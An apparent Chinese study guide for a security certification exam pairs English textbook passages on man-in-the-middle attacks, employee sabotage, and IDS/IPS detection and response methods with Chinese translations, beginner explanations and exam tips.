网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 25 / PDF P1162

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

FIGURE 17.3 A man-in-the-middle attack Man-in-the-middle attacks require more technical sophistication than many other attacks because the attacker needs to successfully impersonate a server from the perspective of the client and impersonate the client from the perspective of the server. A man-in-the-middle attack will often require a combination of multiple attacks. For example, the attacker may alter routing information and DNS values, acquire and install encryption certificates to break into an encrypted tunnel, or falsify Address Resolution Protocol (ARP) lookups as a part of the attack. Some man-in-the-middle attacks are thwarted by keeping systems up-to-date with patches.

An intrusion detection system cannot usually detect man-inthe-middle or hijack attacks, but it can detect abnormal activities occurring over communication links and raise alerts on suspicious activity. Many users often use VPNs to avoid these attacks. Some VPNs are hosted by an employee's organization, but there are also several commercially available VPNs that anyone can use, typically at a cost.

中文直译 / 整理

图 17.3 中间人攻击 中间人攻击比许多其他攻击需要更高的技术复杂性,因为攻击者需要从客户端 的角度成功冒充服务器,并从服务器的角度冒充客户端。 中间人攻击通常需要 多种攻击的组合。 例如,攻击者可能修改路由信息和DNS值,获取并安装加密 证书以突破加密隧道,或在攻击中伪造地址解析协议(ARP)查找。 通过及时为系统打补丁,可以阻止某些中间人攻击。 入侵检测系统通常无法检 测到中间人攻击或劫持攻击,但可以检测通信链路上发生的异常活动,并对可 疑活动发出警报。 许多用户经常使用VPN来避免这些攻击。 一些VPN由员工所 在组织托管,但也存在多种商业可用的VPN,任何人都可以使用,通常需要付 费。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

证书不是密钥本身,而是身份与公钥的可信绑定。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 26 / PDF P1163

第 1163 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Sabotage Employee sabotage is a criminal act of destruction or disruption committed against an organization by an employee. It can become a risk if an employee is knowledgeable enough about the assets of an organization, has sufficient access to manipulate critical aspects of the environment, and becomes a disgruntled employee. Employee sabotage occurs most often when employees suspect they will be terminated without just cause or if employees retain access after being terminated. This is another important reason employee terminations should be handled swiftly, and account access should be disabled as soon as possible after the termination.

Swift action limits the risk of a disgruntled employee becoming an insider threat. Other safeguards against employee sabotage are intensive auditing, monitoring for abnormal or unauthorized activity, keeping lines of communication open between employees and managers, and properly compensating and recognizing employees for their contributions. Intrusion Detection and Prevention Systems The previous section described many common attacks. Attackers are constantly modifying their attack methods, so attacks typically morph over time. Similarly, detection and prevention methods change to adapt to new attacks.

Intrusion detection systems (IDSs) and intrusion prevention systems (IPSs) are two methods organizations typically implement to detect and prevent attacks, and they have improved over the years. Together, they use the term intrusion detection and prevention system (IDPS). An intrusion occurs when an attacker can bypass or thwart security mechanisms and access an organization's resources. Intrusion detection is a specific form of monitoring that monitors events (often in real time) to detect abnormal activity indicating a potential incident or intrusion.

An intrusion detection system (IDS) automates the inspection of logs and real-time system events to detect intrusion attempts and system failures. Because an IPS includes detection capabilities, you'll often see them referred to as intrusion detection and prevention systems (IDPSs). IDSs are an effective method of detecting many DoS and DDoS attacks. They can recognize attacks that come from external connections, such as an attack from the Internet, and attacks that spread internally, such as a malicious worm. Once they detect a suspicious event, they respond by sending alerts or raising alarms. In some cases, they can modify the environment to stop an

中文直译 / 整理

破坏 员工破坏是指员工对组织实施的破坏或干扰行为,属于刑事犯罪。 如果员工对 组织的资产足够了解,拥有足够的权限来操控环境的关键部分,并且成为心怀 不满的员工,就可能构成这种风险。 员工破坏行为通常发生在员工怀疑自己将 被无正当理由解雇,或被解雇后仍保留访问权限时。 这是另一个重要原因,说明员工离职时应迅速处理,并在离职后立即禁用其账 户访问权限。 迅速采取行动可降低心怀不满的员工成为内部威胁的风险。 防范 员工破坏的其他措施包括:加强审计、监控异常或未经授权的活动、保持员工 与管理者之间的沟通渠道畅通,以及适当补偿和认可员工的贡献。 入侵检测与预防系统 上一节描述了许多常见的攻击方式。 攻击者不断修改其攻击方法,因此攻击通 常会随时间演变。 同样,检测和预防方法也会随之调整以应对新的攻击。 入侵 检测系统(IDS)和入侵预防系统(IPS)是组织通常采用的两种检测和预防攻 击的方法,这些方法多年来已得到改进。 它们共同被称为入侵检测与预防系统 (IDPS)。 当攻击者能够绕过或规避安全机制并访问组织的资源时,即发生入侵。 入侵检 测是一种特定的监控形式,用于监控事件(通常为实时)以检测表明潜在事件 或入侵的异常活动。

入侵检测系统(IDS)通过自动化检查日志和实时系统事件 来检测入侵尝试和系统故障。 由于IPS包含检测功能,因此它们通常被称为入侵 检测与预防系统(IDPS)。 入侵检测系统(IDS)是检测多种拒绝服务(DoS)和分布式拒绝服务(DDoS) 攻击的有效方法。 它们能够识别来自外部连接的攻击,例如来自互联网的攻击,以 及在内部传播的攻击,例如恶意蠕虫。 一旦检测到可疑事件,它们会通过发送警报 或触发警报来做出响应。 在某些情况下,它们还可以修改环境以阻止攻击

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1163 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 27 / PDF P1164

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

attack. A primary goal of an IDS is to provide a means for a timely and accurate response to intrusions. An IDS is intended as part of a defense-in-depth security plan. It will work with and complement other security mechanisms such as firewalls, but it does not replace other security mechanisms. An intrusion prevention system (IPS) includes all the capabilities of an IDS but can also take additional steps to stop or prevent intrusions. If desired, administrators can disable an IPS's extra features, essentially causing it to function as an IDS.

NIST SP 800-94—Guide to Intrusion Detection and Prevention Systems (IDPS), provides comprehensive coverage of both intrusion detection and intrusion prevention systems, but for brevity uses IDPS throughout the document to refer to both. In this chapter, we are describing methods used by IDSs to detect attacks, how they can respond to attacks, and the types of IDSs available. We are then adding information on IPSs where appropriate. Knowledgeand Behavior-Based Detection An IDS actively watches for suspicious activity by monitoring network traffic and inspecting logs. For example, an IDS can have sensors or agents monitoring key devices such as routers and firewalls on a network.

These devices have logs that can record activity, and the sensors can forward these log entries to the IDS for analysis. Some sensors send all the data to the IDS, whereas other sensors inspect the entries and only send specific log entries based on how administrators configure the sensors. The IDS evaluates the data and can detect malicious behavior using two common methods: knowledge-based detection and behavior-based detection. In short, knowledge-based detection uses signatures similar to the signature definitions used by anti-malware software.

Behavior-based detection doesn't use signatures but instead compares activity against a baseline of normal performance to detect anomalies and abnormal behavior. Many IDSs use a combination of both methods. Knowledge-Based Detection The most common method of detection is knowledge-based detection (also called signature-based detection or pattern- 。

中文直译 / 整理

入侵检测系统的主要目标是提供一种及时且准确应对入侵的手段。 IDS 的目的是 p防御艺术的一部分 p安全计划。 它将与其他安全机制协同工作并形成补充,例如 防火墙,但它不能替代其他安全机制。 入侵预防系统(IPS)包含 IDS 的所有功能,还可以采取额外措施来阻止或 防止入侵。 如果需要,管理员可以禁用 IPS 的额外功能,使其本质上作为 IDS 运行。 NIST SP 800‑94—入侵检测和预防系统(IDPS)指南,全面涵盖了入侵检测系 统和入侵预防系统,但为简洁起见,全文使用IDPS指代两者。 在本章中,我们 描述了IDS用于检测攻击的方法、它们如何应对攻击以及可用的IDS类型,并在 适当处补充了关于IPS的信息。 基于知识和行为的检测 IDS通过监控网络流量和检查日志主动发现可疑活动。 例如,IDS可以拥有传 感器或代理程序,监控网络中的关键设备,如路由器和防火墙。 这些设备具有 可记录活动的日志,传感器可将这些日志条目转发给IDS进行分析。 一些传感 器将所有数据发送给IDS,而其他传感器则会检查条目,并根据管理员对传感 器的配置,仅发送特定的日志条目。

IDS评估数据,并使用两种常见方法检测恶意行为:基于知识的检测和基于行 为的检测。 简而言之,基于知识的检测使用类似于反恶意软件软件所用的签名 定义; 基于行为的检测不使用签名,而是将活动与正常性能基线进行比较,以 检测异常和异常行为。 许多IDS结合使用这两种方法。 基于知识的检测 最常见的检测方法是基于知识的检测(也称为基于特征的检测或模 式‑

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 28 / PDF P1165

第 1165 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

matching detection). It uses a database of known attacks developed by the IDS vendor. For example, some automated attack tools are available to launch SYN flood attacks, and these tools have known patterns and characteristics defined in a signature database. Real-time traffic is matched against the database, and if the IDS finds a match, it raises an alert. A primary benefit of this method is that it has a low false-positive rate. The primary drawback of a knowledge-based IDS is that it is effective only against known attack methods. New attacks, or slightly modified versions of known attacks, often go unrecognized by the knowledge-based IDS.

Knowledge-based detection on an IDS is similar to signature-based detection used by anti-malware applications. The anti-malware application has a database of known malware and checks files against the database looking for a match. Just as anti-malware software must be regularly updated with new signatures from the anti-malware vendor, IDS databases must be regularly updated with new attack signatures. IDS vendors commonly provide automated methods to update the signatures. Behavior-Based Detection The second detection type is behavior-based detection (also called statistical intrusion detection, anomaly-based detection, and heuristics-based detection).

Behavior-based detection starts by creating a baseline of normal activities and events on the system. Once it has accumulated enough baseline data to determine normal activity, it can detect abnormal activity that may indicate a malicious intrusion or event. This baseline is often created over a finite period such as a week. If the network is modified, the baseline needs to be updated. Otherwise, the IDS may alert you to normal behavior that it identifies as abnormal. Some products continue to monitor the network to learn more about normal activity and will update the baseline based on the observations. Chapter 21 covers user and entity behavior analytics (UEBA) functions.

UEBA tools create user profiles (similar to a baseline for a network) based on individual behavior. They then watch for deviations in normal behavior that may indicate malicious activity. Behavior-based IDSs use the baseline, activity statistics, and heuristic evaluation techniques to compare current activity against previous activity to detect potentially malicious events. Many can perform stateful packet

中文直译 / 整理

匹配检测)。 它使用由IDS供应商开发的已知攻击数据库。 例如,有一些自动化 攻击工具可用于发起SYN洪水攻击,这些工具具有在特征数据库中定义的已知 模式和特征。 实时流量会与数据库进行匹配,如果IDS找到匹配项,就会发出警 报。 这种方法的主要优点是误报率较低。 基于知识的IDS的主要缺点是它仅对已 知的攻击方法有效。 新的攻击或对已知攻击的轻微修改版本通常无法被基于知 识的IDS识别。 基于知识的入侵检测系统(IDS)检测类似于反恶意软件应用程序使用的基于 签名的检测。 反恶意软件应用程序拥有一个已知恶意软件的数据库,并检查文 件以查找匹配项。 正如反恶意软件软件必须定期从供应商处更新新的签名一样, IDS数据库也必须定期更新新的攻击签名。 IDS供应商通常提供自动化的签名 更新方法。 基于行为的检测 第二种检测类型是基于行为的检测(也称为统计入侵检测、异常 检测和基于启发式的检测)。 基于行为的检测首先创建系统上正常活动和事件的 基线。 一旦积累足够多的基线数据以确定正常活动,它就能检测可能表明恶意入 侵或事件的异常活动。 此基线通常在有限的时间段内创建,例如一周。 如果网络发生更改,则需要 更新基线。

否则,IDS可能会将正常行为误报为异常行为。 一些产品会持续 监控网络以进一步了解正常活动,并根据观察结果更新基线。 第21章涵盖用户和实体行为分析(UEBA)功能。 UEBA工具基于个体 行为创建用户画像(类似于网络的基线),并监控可能指示恶意活动的正 常行为偏差。 基于行为的入侵检测系统使用基线、活动统计和启发式评估技术,将当前活动与以 往活动进行比较,以检测潜在的恶意事件。 许多系统能够执行有状态的数据包

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1165 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

检测是 IDS,主动阻断更像 IPS。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 29 / PDF P1166

第 1166 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

analysis similar to how stateful inspection firewalls (covered in Chapter 11) examine traffic based on the state or context of network traffic. Anomaly analysis adds to an IDS's capabilities by allowing it to recognize and react to sudden increases in traffic volume or activity, multiple failed login attempts, logons or program activity outside normal working hours, or sudden increases in error or failure messages. All of these could indicate an attack that a knowledge-based detection system may not recognize. A behavior-based IDS can be labeled an expert system or a pseudo-artificial intelligence system because it can learn and make assumptions about events.

In other words, the IDS can act like a human expert by evaluating current events against known events. The more information provided to a behaviorbased IDS about normal activities and events, the more accurately it can detect anomalies. A significant benefit of a behavior-based IDS is that it can detect newer attacks that have no signatures and are not detectable with the signature-based method.

中文直译 / 整理

类似于有状态检测防火墙(参见第11章)根据网络流量的状态或上下文检查流量的方式进 行分析。 异常分析通过使入侵检测系统能够识别并应对流量或活动的突然增加、多次登 录失败、在正常工作时间之外的登录或程序活动,或错误或失败消息的突然增 加,从而增强了其功能。 所有这些都可能表明一种基于知识的检测系统可能无 法识别的攻击。 基于行为的IDS可被标记为专家系统或伪人工智能系统,因为它能够学习并就 事件做出假设。 换句话说,IDS可以通过将当前事件与已知事件进行对比来像 人类专家一样行动。 向基于行为的IDS提供的关于正常活动和事件的信息越多, 它检测异常的准确性就越高。 基于行为的IDS的一个重要优势是,它能够检测 到没有签名且无法通过基于签名的方法检测到的新型攻击。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1166 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 30 / PDF P1167

第 1167 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

False Positive or True Negative? The concept of false positives, false negatives, true positives, and true negatives often causes confusion. However, there are only four possibilities, and with IDPSs they are related to an incident and detection. Either an incident occurred or it didn't, and the IDPS either detected it or it didn't. The following graphic shows the four possibilities and the following bullets explain them. True positive: An incident occurs and is detected. False negative: An incident occurs but is not detected. False positive: An incident is detected but did not occur. True negative: An incident does not occur and is not detected.

You'll see the same concepts used in different areas. As an example, biometrics have four possibilities, too. After a user registers with a biometric system, the system should be able to authenticate the user. In contrast, the biometric system shouldn't authenticate impostors (or users who haven't registered with the biometric system). True positive: A registered user tries to authenticate and is authenticated. False negative: A registered user tries to authenticate but is not authenticated (or is rejected). False positive: An impostor tries to authenticate and is authenticated.

中文直译 / 整理

假阳性还是真阴性? 假阳性、假阴性、真阳性和真阴性的概念常常引起混淆。 然而,只有四种 可能性,且对于IDPS而言,它们都与事件和检测相关。 要么事件发生了, 要么没有发生; 要么IDPS检测到了,要么没有检测到。 下图展示了四种可能性,以下项目符号将对其进行解释。 真阳性:发生了一起事件并被检测到。 假阴性:发生了一起事件但未被检测到。 假阳性:检测到一起事件,但该事件并未发生。 真阴性:未发生事件,也未被检测到。 您会看到相同的概念在不同领域中被使用。 例如,生物识别系统也有四种 可能性。 用户在生物识别系统中注册后,系统应能对用户进行身份验证。 相反,生物识别系统不应验证冒充者(或未在生物识别系统中注册的用户)。 真阳性:已注册用户尝试身份验证并成功通过身份验证。 假阴性:已注册用户尝试身份验证但未通过身份验证(或被拒绝)。 假阳性:冒充者尝试身份验证并成功通过身份验证。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1167 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
学习单元 31 / PDF P1168

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

True negative: An impostor tries to authenticate but is not authenticated. The primary drawback of a behavior-based IDS is that it often raises many false alarms, also called false alerts or false positives. In other words, it incorrectly indicates an attack when an attack isn't present. Patterns of user and system activity can vary widely during normal operations, making it difficult to define normal and abnormal activity boundaries accurately. In contrast, signature-based systems have a low false positive alarm rate. Either the traffic matches the known signature and is a positive, causing an alarm, or it doesn't.

However, signature-based systems can have a high falsenegative rate, especially against new attacks. In other words, they do not recognize new attacks because they don't have a signature to detect them, and they don't raise an alarm. False Alarms Many IDS administrators have a challenge finding a balance between the number of false alarms or alerts that an IDS sends and ensuring that the IDS reports actual attacks. In one organization we know about, an IDS sent a series of alerts over a couple of days that were aggressively investigated but turned out to be false alarms. Administrators began losing faith in the system and regretted wasting time chasing these false alarms.

Later, the IDS began sending alerts on an actual attack. However, administrators were actively troubleshooting another issue that they knew was real, and they didn't have time to chase what they perceived as more false alarms. They simply dismissed the alarms on the IDS and didn't discover the attack until a few days later. IDS Response Although knowledge-based and behavior-based IDSs detect incidents differently, they both use an alert system. When the IDS detects an event, it

中文直译 / 整理

真阴性:冒充者尝试进行身份验证,但未被认证。 基于行为的入侵检测系统的主要缺点是它经常产生大量误报,也称为误警报 或假阳性。 换句话说,当没有攻击发生时,它会错误地指示存在攻击。 在正 常操作期间,用户和系统活动的模式可能差异极大,使得准确界定正常与异 常活动的边界变得困难。 相比之下,基于签名的系统误报率较低。 流量要么匹配已知签名,从而被判定 为正例并触发警报; 要么不匹配。 然而,基于签名的系统在面对新型攻击时可 能具有较高的漏报率。 换句话说,由于缺乏可用于检测的签名,它们无法识别 新的攻击,因而也不会发出警报。 误报 许多入侵检测系统管理员面临一个挑战:在控制入侵检测系统发送的误报 或警报数量与确保系统报告真实攻击之间取得平衡。 我们了解的一个组织 中,入侵检测系统在几天内发送了一系列警报,这些警报被进行了深入调 查,但最终被证实为误报。 管理员开始对系统失去信心,并后悔浪费时间 追查这些误报。 后来,IDS 开始对一次实际攻击发出警报。 然而,管理员正在积极排查另 一个他们已知真实存在的问题,没有时间去追查他们认为是更多误报的警 报。 他们直接忽略了 IDS 上的警报,直到几天后才发现这次攻击。

IDS 响应 尽管基于知识和基于行为的入侵检测系统检测事件的方式不同,但它们都使用警 报系统。 当入侵检测系统检测到事件时,它

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

检测是 IDS,主动阻断更像 IPS。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
身份 身份是主体在系统中的标识。
学习单元 32 / PDF P1169

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

triggers an alarm or alert. It can then respond using a passive or active method. A passive response logs the event and sends a notification. An active response changes the environment to block the activity in addition to logging and sending a notification. In some cases, you can measure a firewall's effectiveness by placing a passive IDS before the firewall and another passive IDS after the firewall. By examining the alerts in the two IDSs, you can determine what attacks the firewall is blocking in addition to determining what attacks are getting through. Passive Response Notifications can be sent to administrators in different ways, such as via email or text messages.

In some cases, the alert can generate a report detailing the activity leading up to the event, and logs are available for administrators to get more information if needed. Many 24-hour network operations centers (NOCs) have central monitoring screens viewable by everyone in the main support center. For example, a single wall can have multiple large-screen monitors providing data on different elements of the NOC. The IDS alerts can be displayed on one of these screens to ensure that personnel are aware of the event. These instant notifications help administrators respond quickly and effectively to unwanted behavior.

Active Response Active responses can modify the environment using several different methods. Typical responses include modifying firewall ACLs to block traffic based on ports, protocols, and source addresses, and even disabling all communications over specific cable segments. For example, if an IDS detects a SYN flood attack from a single IP address, the IDS can change the ACL to block all traffic from this IP address. Similarly, if the IDS detects a ping flood attack from multiple IP addresses, it can change the ACL to block all ICMP traffic. The “Firewalls” section, later in this chapter, discusses firewall ACLs in greater depth.

An IDS can also block access to resources for suspicious or ill-behaved users. Security administrators configure these active responses in advance and tweak them based on changing needs with the environment.

中文直译 / 整理

